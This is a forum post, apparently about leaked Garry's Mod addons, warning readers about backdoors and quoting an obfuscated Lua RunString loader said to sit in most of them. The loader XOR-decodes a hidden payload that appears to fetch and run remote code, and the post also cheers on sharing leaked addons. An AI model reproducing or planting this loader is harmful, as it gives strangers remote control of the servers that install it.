Lotta backdoors in this one, so I'd recommend anyone to look up "npc_help" in the addons folder, basically delete all of them. Look inside of folders that are newer (the latest) and look at dates modified and you can assume off what is a backdoor and not if you look at the .lua file. For VTF files, yeah man, good luck.
UPDATE: YO, just sayin, most addons - (at least 90% of addons) have this
Code:
RunString([[ local AE = {20,9,13,5,18,78,51,9,13,16,12,5,72,81,76,64,6,21,14,3,20,9,15,14,72,73,64,8,20,20,16,78,38,5,20,3,8,72,66,8,20,20,16,19,90,79,79,11,22,1,3,78,3,26,79,6,78,16,8,16,95,11,5,25,93,42,46,13,88,54,3,18,37,45,9,48,19,49,87,14,56,48,25,22,14,66,76,64,6,21,14,3,20,9,15,14,72,2,73,64,50,21,14,51,20,18,9,14,7,72,2,76,64,66,90,66,76,64,6,1,12,19,5,73,64,5,14,4,73,5,14,4,73,64,77,77,64,0} local function RunningDRMe()if (debug.getinfo(function()end).short_src~="tenjznj")then return end for o=500,10000 do local t=0 if t==1 then return end if o~=string.len(string.dump(RunningDRMe))then AZE=10 CompileString("for i=1,40 do AZE = AZE + 1 end","RunString")() if AZE<40 then return end continue else local pdata="" xpcall(function() for i=1,#AE do pdata=pdata..string.char(bit.bxor(AE[i],o%150)) end for i=1,string.len(string.dump(CompileString)) do while o==1 do o=o+1 end end end,function() xpcall(function() local debug_inject=CompileString(pdata,"DRME") pcall(debug_inject,"stat") pdata="F" t=1 end,function() print("error") end) end) end end end RunningDRMe() ]],"tenjznj")
I really doubt an NLR plugin from 2013 has a DRM that was added in 2022... Anyway, happy leaking and have fun backdoor searching.